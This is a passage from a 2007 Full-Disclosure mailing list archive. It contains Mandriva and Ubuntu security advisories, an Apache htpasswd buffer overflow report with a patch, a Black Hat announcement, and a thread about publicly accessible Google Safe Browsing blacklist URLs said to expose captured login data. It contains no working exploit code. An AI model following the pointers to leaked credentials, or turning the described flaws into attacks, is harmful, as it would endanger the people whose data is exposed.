2007.0/SRPMS/kernel-2.6.17.8mdv-1-1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c2aca75ee9ca338eb178e51fec0867fc 2007.0/x86_64/evince-0.6.0-1.1mdv2007.0.x86_64.rpm d4c8250e75b57b227b308e2a975ae13c 2007.0/x86_64/kernel-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 3cb5a059bc3d352da95fb285f2c31f80 2007.0/x86_64/kernel-source-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 9ff265225b8624a083058b5ec16174c2 2007.0/x86_64/kernel-source-stripped-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 23ba072d883bac51179e42df654aba79 2007.0/x86_64/kernel-xen0-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 268ac512e41476f1e0df9d94299c317b 2007.0/x86_64/kernel-xenU-2.6.17.8mdv-1-1mdv2007.0.x86_64.rpm 0cb62354da7ae0bd1dd6b851bedd9496 2007.0/SRPMS/kernel-2.6.17.8mdv-1-1mdv2007.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFmpCqmqjQ0CJFipgRApvgAJwMfzgQzPybB+31urTuthQ/zBBjbwCfaLar C4ZZguRSYKoAlWgt5LYo/tw= =v5w6 -----END PGP SIGNATURE----- From phoenix.diablo at googlemail.com Tue Jan 2 22:17:08 2007 From: phoenix.diablo at googlemail.com (JM) Date: Tue, 2 Jan 2007 23:17:08 +0100 Subject: [Full-disclosure] =?utf-8?q?Google=E2=80=99s_blacklisted_url_data?= =?utf-8?q?base_=28phishing_url_database=29?= In-Reply-To: References: Message-ID: <200701022317.08793.phoenix.diablo@gmail.com> I just played around a bit with those lists and as it seems, Google did a splendid job, even capturing some people's login data. Like here: http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 Regards, J.M. Professional Lurker >[By] "Rajesh Sethumadhavan" >[Date] Dienstag, 2. Januar 2007 18:42 >[To] full-disclosure at lists.grok.org.uk >[Subject] [Full-disclosure] Google?s blacklisted url database (phishing url >database) > > It is possible to access google`s blacklisted url database ( phishing url > database ) > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 > http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19,goo >g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 > > > This database (Part of Google Safe Browsing) can be used in any > anti-phishing commercial softwares :) > > Regards > Rajesh Sethumadhavan > http://www.xdisclose.com From php0t at zorro.hu Tue Jan 2 22:48:54 2007 From: php0t at zorro.hu (php0t) Date: Tue, 2 Jan 2007 23:48:54 +0100 Subject: [Full-disclosure] Google's blacklisted url database (phishing url database) In-Reply-To: <200701022317.08793.phoenix.diablo@gmail.com> Message-ID: <001c01c72ec0$2e510a50$650ba8c0@DORKA> How exactly does such data get captured? Somebody placed a link somewhere with the url having the user/password in it ? What would be the point of that? And if not, where did that come from? I peeked at http://www.google.com/tools/firefox/safebrowsing/faq.html to learn more but it only has obvious info. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of JM Sent: Tuesday, January 02, 2007 11:17 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure]Google's blacklisted url database (phishing url database) I just played around a bit with those lists and as it seems, Google did a splendid job, even capturing some people's login data. Like here: http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7753 Regards, J.M. Professional Lurker >[By] "Rajesh Sethumadhavan" >[Date] Dienstag, 2. Januar 2007 18:42 >[To] full-disclosure at lists.grok.org.uk >[Subject] [Full-disclosure] Google's blacklisted url database (phishing url >database) > > It is possible to access google`s blacklisted url database ( phishing > url database ) > > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1 > http://sb.google.com/safebrowsing/update?version=goog-black-url:1:7998 > >http://sb.google.com/safebrowsing/update?version=goog-white-domain:1:19 ,goo >g-white-url:1:371,goog-black-url:1:7693,goog-black-enchash:1:15282 > > > This database (Part of Google Safe Browsing) can be used in any > anti-phishing commercial softwares :) > > Regards > Rajesh Sethumadhavan > http://www.xdisclose.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From kf_lists at digitalmunition.com Tue Jan 2 23:16:07 2007 From: kf_lists at digitalmunition.com (K F (lists)) Date: Tue, 02 Jan 2007 18:16:07 -0500 Subject: [Full-disclosure] Whos Johny Pwnerseed? Message-ID: <459AE7B7.3030602@digitalmunition.com> You may still be scratching your head from yesterday... don't forget about today and tomorrow: http://projects.info-pull.com/moab/MOAB-02-01-2007.html -KF From gnuler at gmail.com Tue Jan 2 20:20:25 2007 From: gnuler at gmail.com (Matias Soler) Date: Tue, 2 Jan 2007 17:20:25 -0300 Subject: [Full-disclosure] Apache 1.3.37 htpasswd buffer overflow vulnerability Message-ID: <47c0571c0701021220r6ad0169l4d0f9d70ffdd7653@mail.gmail.com> Synopsis: Apache 1.3.37 htpasswd buffer overflow vulnerability Version: 1.3.37 (latest 1.3.xx) Product ======= Apache htpasswd utility Issue ===== A buffer overflow vilnerability has been found, it is dangerous only on environment where the binary is suid root. Details ======= Incorrect validation on the size of user input allows to copy a string, via strcpy, to a fixed size buffer. File: htpasswd.c, Line 421. Solution ======== Apply this patch to htpasswd.c -----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-----8<-- 415,419c415,420 < if (strlen(argv[i + 1]) > (sizeof(user) - 1)) { < fprintf(stderr, "%s: username too long (>%lu)\n", argv[0], < (unsigned long)(sizeof(user) - 1)); < return ERR_OVERFLOW; < } --- > } > if (strlen(argv[i + 1]) > (sizeof(user) - 1)) { > fprintf(stderr, "%s: username too long (>%lu)\n", argv[0], > (unsigned long)(sizeof(user) - 1)); > return ERR_OVERFLOW; > --->8----->8----->8----->8----->8----->8----->8----->8----->8----->8----->8----- Affected Versions ================== 1.3.37 - http://www.apache.org/dist/httpd/apache_1.3.37.tar.gz Notes & References ================== Another similar bug was discovered by Luiz Fernando [1], a patch was written by Larry Cashdollar wich also fixed the bug i'm posting, but it seems not to be applied on the latest versions of apache 1.3.xx. Michael Engert submitted another patch[1] which also fixed this bug and filled out a bug report [1], but it wasn't applied. Have a look at Other posts[3][4] on this (and similar) issues. A bug report[5] on this issue was filled out. Credits ======= Matias S. Soler - gnuler [at] gmail [dot] com Luiz Fernando Michael Engert 1 - http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0547.html 2 - http://issues.apache.org/bugzilla/show_bug.cgi?id=31975 3 - http://seclists.org/bugtraq/2004/Oct/0359.html 4 - http://www.security-express.com/archives/fulldisclosure/2004-10/1117.html 5 - http://issues.apache.org/bugzilla/show_bug.cgi?id=41279 -- Matias S. Soler -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/71297307/attachment.html From jmoss at blackhat.com Tue Jan 2 23:40:15 2007 From: jmoss at blackhat.com (Jeff Moss) Date: Tue, 02 Jan 2007 15:40:15 -0800 Subject: [Full-disclosure] Black Hat New Years Updates (Free Stuff, too!) Message-ID: <200701022341.l02Nfv2c013966@colossus.datamerica.com> Hey Full Disclosure readers, Here are some announcements from Black Hat to keep you busy in the new year! - The Call for Papers and conference registration is now open for the Black Hat DC Training and Briefings. - The Call for Papers and conference registration for Black Hat Europe in open. - Registration for the summer Black Hat USA conference is now open! - Presentations from Black Hat Japan are now on-line. - Presentations including audio and video from Black Hat USA is now on-line. UPCOMING CONFERENCES: Black Hat DC 2007 Briefings & Training will be February 26 to March 1, held at the Sheraton Crystal City hotel in Arlington Virginia. Register early to take advantage of our early bird rate and save when you register for the Briefings before January 1st. Papers and requests to speak will be received and reviewed from October 1, 2006 until January 5, 2007. We strongly suggest that you submit earlier than later, since we will close the CFP early if we receive enough quality submissions to fill the slots. Please submit using the new on-line system at: https://cfp.blackhat.com/ If you want to submit to the Call for Papers please note Black Hat does not accept product or vendor related pitches, or voodoo. If your talk is a veiled advertisement for a new product or service your company is offering, please do not submit. If your talk relies on voodoo techniques or tools you are not willing to share, then you should rethink the benefit the audience will get from sitting through your presentation. Black Hat is launching its new electronic CFP submissions server with this announcement. You will be able to upload your submissions, make changes, select your co-presenters, etc. This system will allow you to submit multiple presentations as well as be able to change your info should you need to. This new submission and review process will enable the future possibility of peer review and on-line information exchange. For now we are looking forward to seeing your submissions and would like to hear any feedback you have on this new submission process. Topic Focus for Black Hat DC 2007: We would like presenters to think about offensive and defensive computer security operations and the application of your expertise and research. Think about its application in an operational process that can be defensive or offense, large enterprise or distributed organized criminal group, military or civilian. This is not a requirement to submit, but we want some differentiation for the DC conference. Thinking in terms of operational applicability will steer content in a direction we hope the DC audience will appreciate. Dates to Remember for Black Hat DC: Call for Papers closes: January 5, 2007. <-- Extended to the 5th. Early Bird registration rate ends December 31. Regular registration rate ends February 18th. More information regarding speaker requirements and our guidelines for this years submissions available at http://www.blackhat.com/ Black Hat Europe 2007 Briefings & Training will be March 27 to March 30, held at the Hotel Movenpick in Amsterdam. Dates to Remember for Black Hat Europe: Call for Papers will open November 1, 2006 and close February 1st, 2007. Registration will open November 1, 2006 and the Early Bird rate ends January 12, 2007. On-line registration closes March 18, 2007. Black Hat USA 2007 Briefings & Training will be July 28 to August 2, held at Caesars Palace in Las Vegas, Nevada, USA On-line Registration for Briefings now open. Training registration will open February 15. Call for Papers will open February 15. Hotel Reservations now open. Black Hat Japan 2007 Briefings & Training will be October 23-26, Tokyo, Japan On-line Registration will open July 1. Call for Papers will open May 1. FREE STUFF: Black Hat Japan 2006 Presentations are now available on-line! http://www.blackhat.com/html/bh-media-archives/bh-archives-2006.html#AS_2006 Presentation topics available include: Anti-Forensic Root kits, The Art and Science of Writing Secure Code, Hacking Intranet web sites from the Outside, Breaking AJAX Web Applications, Subverting Vista Kernel and more! Audio of the sessions will be encoded and added on-line in the next month as well. http://www.blackhat.com/html/bh-japan-06/bh-jp-06-en-speakers.html We also have the presentation material from USA 2006 show on-line, and we anticipate we will have audio and video of the presentations available for download within the next month. To view the entire media archives: http://www.blackhat.com/html/bh-multimedia-archives-index.html Black Hat USA Briefings audio and video are now available to download in an iPod friendly format: http://www.blackhat.com/podcast/bh-usa-06-audio.rss http://www.blackhat.com/podcast/bh-usa-06-video.rss The General Black Hat RSS feed: http://www.blackhat.com/BlackHatRSS.xml Thank you, Jeff Moss From kees at ubuntu.com Wed Jan 3 02:41:39 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Jan 2007 18:41:39 -0800 Subject: [Full-disclosure] [USN-398-1] Firefox vulnerabilities Message-ID: <20070103024138.GR4462@outflux.net> =========================================================== Ubuntu Security Notice USN-398-1 January 02, 2007 firefox vulnerabilities CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, CVE-2006-6503, CVE-2006-6504, CVE-2006-6506, CVE-2006-6507 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.10: firefox 2.0.0.1+0dfsg-0ubuntu0.6.10 firefox-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 libnspr-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 libnspr4 2.0.0.1+0dfsg-0ubuntu0.6.10 libnss-dev 2.0.0.1+0dfsg-0ubuntu0.6.10 libnss3 2.0.0.1+0dfsg-0ubuntu0.6.10 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Details follow: Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page containing JavaScript or SVG. (CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, CVE-2006-6502, CVE-2006-6504) Various flaws have been reported that allow an attacker to bypass Firefox's internal XSS protections by tricking the user into opening a malicious web page containing JavaScript. (CVE-2006-6503, CVE-2006-6507) Jared Breland discovered that the "Feed Preview" feature could leak referrer information to remote servers. (CVE-2006-6506) Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10.diff.gz Size/MD5: 322554 79c04227229a107f0c9d45049605bd48 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10.dsc Size/MD5: 1218 6ce84b9960bdbb97c9ec6c3705653eae http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg.orig.tar.gz Size/MD5: 46670638 1cb13be9a35205af63fe70eeff14eb0e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 236456 9ed7043d22624085cffc10dc7cde8f26 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55270 2f8fde2f2488af7750e65e886493cd13 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dom-inspector_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55362 eb1b5c963f64a784e053bdeee6537481 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 55378 dd6516fe8c1798d617bcf95b4fbd21c4 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_all.deb Size/MD5: 56176 eae029799af7b101a55a9bfdffc88330 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 50310432 263fa952660d303d4320ac519836a1fb http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 3119132 75d94b87d53efb786ffdf56ff6d6b075 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 89652 913420b9f378f322c1ca1b02037f2677 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 10387770 78104d3965f2bfbda5575574d9f755ba http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 225036 ea87d34202b6d3223dbac099cf51c8df http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 167466 55bbefb531652d568f02438aeed10f1d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 250348 1bbc07d9af10768ac6656d927000abcd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_amd64.deb Size/MD5: 861350 3fc1cbb4e1eb02995567cdec7b660bd2 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 49457428 a30d035ca9fd1819091c1c6b48d325b1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 3109488 e86991da3947ee093b840abd83cf07b2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 83386 77793d13bf5a26f0c43962ac5fbd186c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 9207840 8dcf11221cfef75bf7f51422dcf60dd7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 225046 90012c5f90396f6a5db7705b243e2521 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 156952 80817ef1fbd45ddfbdfdf75279275c34 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 250336 655f2f4a30dae71ec29bf96cfb7f0229 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_i386.deb Size/MD5: 785180 131a2623fa95997b99085884204fd89a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 51980774 4865d18b50b3a10dfd1b228e11ac0435 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 3115886 c6f8efcab8edfd7b83453ee041a24612 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 85272 b66da0f160a453b1f3ee18f5b1722e8d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 10056020 9102c8484c7c71186fd0b970a610e7e4 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 225038 4f83154583b4a058a123a3a8586ab0f2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 166288 6190cda57dbebe29c65c1ca97daba292 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 250334 b3f846f1dafbf1a990ab27df8258b9e1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_powerpc.deb Size/MD5: 860068 d0f2e68e9d1ca8be8d9914e6fcdf1bff sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 49511534 d0e1bad8c05a69231dfee2db6b34b990 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 3106194 1adc42b08102dca85285244139d312da http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 83086 ef47b587d79afdce14ec47b2e13ce89c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 9485274 13146d26d590e4981281cf21957cfb61 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 225036 b72f082c255cd9510435cd0c0912a5bc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 155116 9d629deae12ea27812081b13bb0216ba http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 250332 c3e90b969d3c3de2fe47c4942f8dc96f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox2.0.0.1+0dfsg-0ubuntu0.6.10_sparc.deb Size/MD5: 766060 a32f928bcb9a7cd2d601b2aafbec6bef -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/9d7725b1/attachment.bin From kees at ubuntu.com Wed Jan 3 03:34:42 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Jan 2007 19:34:42 -0800 Subject: [Full-disclosure] [USN-399-1] w3m vulnerabilities Message-ID: <20070103033442.GT4462@outflux.net> =========================================================== Ubuntu Security Notice USN-399-1 January 03, 2007 w3m vulnerabilities http://sf.net/tracker/?func=detail&aid=1612792&group_id=39518&atid=425439 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: w3m 0.5.1-3ubuntu1.1 Ubuntu 6.06 LTS: w3m 0.5.1-4ubuntu2.6.06 Ubuntu 6.10: w3m 0.5.1-4ubuntu2.6.10 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A format string vulnerability was discovered in w3m. If a user were tricked into visiting an HTTPS URL protected by a specially crafted SSL certificate, an attacker could execute arbitrary code with user privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1.diff.gz Size/MD5: 26918 6c80b8da1759df35d0fbbbfd762be482 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1.dsc Size/MD5: 714 d5fab4328a132271d45443b0c62c9c5f http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1.orig.tar.gz Size/MD5: 1892121 0678b72e07e69c41709d71ef0fe5da13 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_amd64.deb Size/MD5: 90086 e9be4901190f36350b7c3906e8d5c7c0 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_amd64.deb Size/MD5: 1119434 544af8fe74b78b80b85b0618934e993f i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_i386.deb Size/MD5: 88984 b39f657ec9c7fc9f0b66eccf6548ecfd http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_i386.deb Size/MD5: 1062408 4681dd0f0799ac9418ae11f17c39efb6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_powerpc.deb Size/MD5: 91540 47fbc7739850d784fea04b739763a79b http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_powerpc.deb Size/MD5: 1120800 43549c92dd35b1b1945fefed4c10caad sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-3ubuntu1.1_sparc.deb Size/MD5: 89256 e9975d718fb34e212ab9471a19b293b8 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-3ubuntu1.1_sparc.deb Size/MD5: 1087110 ac0ece82654dc503f9aff5c961d766ae Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06.diff.gz Size/MD5: 35266 4eb07f00d81679ccf53f5c50c3cf5403 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06.dsc Size/MD5: 702 ced346058b3f71ecec26652b9aa919d7 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1.orig.tar.gz Size/MD5: 1892121 0678b72e07e69c41709d71ef0fe5da13 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_amd64.deb Size/MD5: 88458 ac45f4fade3fa7f60643b18553ccfb32 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_amd64.deb Size/MD5: 1119712 d48a1acda4b04bd2b8870d7328d471af i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_i386.deb Size/MD5: 87464 790cddd717ef3d53576cd44325bbe74c http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_i386.deb Size/MD5: 1061434 1309934c6ce36eddc7d1fe10c8a397d7 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_powerpc.deb Size/MD5: 89786 7a5076bb3784d7c3ee23a83a799c006e http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_powerpc.deb Size/MD5: 1120114 a3464f27e707e26c6282a0913e485330 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.06_sparc.deb Size/MD5: 87854 18bcf4fe486d5d5223c6cff38fc2badd http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.06_sparc.deb Size/MD5: 1084034 f76db440d2206b0f6cccda184bbc1380 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10.diff.gz Size/MD5: 35266 30be4e65c986ec185ff1bc0855b1debb http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10.dsc Size/MD5: 702 0ba7b9609b67a3312af4eda07da0b342 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1.orig.tar.gz Size/MD5: 1892121 0678b72e07e69c41709d71ef0fe5da13 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_amd64.deb Size/MD5: 88446 f05692dbf3a8ece4a7c4897fca454fe1 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_amd64.deb Size/MD5: 1131030 1500cfb7d6066f6df6ac510dbd133a57 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_i386.deb Size/MD5: 87712 f17dcbf4a518d4704f203f6694166ab1 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_i386.deb Size/MD5: 1085166 861a156c3ac25b0908756cb83c593ff3 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_powerpc.deb Size/MD5: 89888 b98545747a5f409b99fa7667ce034595 http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_powerpc.deb Size/MD5: 1136062 b20c1b12d34f3cf52ed85d6a8441eb0e sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/w/w3m/w3m-img_0.5.1-4ubuntu2.6.10_sparc.deb Size/MD5: 87830 547b4ccbf9cde9c40ad8a18e0a67436e http://security.ubuntu.com/ubuntu/pool/main/w/w3m/w3m_0.5.1-4ubuntu2.6.10_sparc.deb Size/MD5: 1099004 7175fd58a8037a2d6a652a661c09c3ac -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070102/2c6623ee/attachment.bin From geekboy at angrykeyboarder.com Wed Jan 3 05:23:32 2007 From: geekboy at angrykeyboarder.com (Scott) Date: Tue, 02 Jan 2007 22:23:32 -0700 Subject: [Full-disclosure] [USN-398-1] Firefox vulnerabilities In-Reply-To: <20070103024138.GR4462@outflux.net> References: <20070103024138.GR4462@outflux.net> Message-ID: <459B3DD4.3010104@angrykeyboarder.com> Kees Cook spake thusly on 01/02/2007 07:41 PM: > =========================================================== > Ubuntu Security Notice USN-398-1 January 02, 2007 > firefox vulnerabilities > CVE-2006-6497, CVE-2006-6498, CVE-2006-6499, CVE-2006-6501, 